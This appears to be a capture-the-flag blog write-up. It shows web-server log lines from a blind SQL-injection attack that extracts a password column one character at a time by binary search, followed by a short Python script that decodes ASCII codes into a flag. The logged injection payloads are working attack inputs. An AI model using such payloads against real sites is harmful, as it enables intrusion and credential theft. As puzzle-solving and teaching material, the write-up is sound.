| 127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E109 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E108 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E119 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E123 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E125 HTTP/1.1" 302 734 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15" | |
| 127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E124 HTTP/1.1" 200 925 "-" "Python-urllib/1.15" |
?? => analysis by yourself :D
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| # Johan Wayudi | |
| a = [70,76,65,71,123,??,111,??,108,73,115,??,111,111,??,125] | |
| data = "" | |
| for i in range(len(a)): | |
| data += chr(a[i]) | |
| print data |
No comments
Post a Comment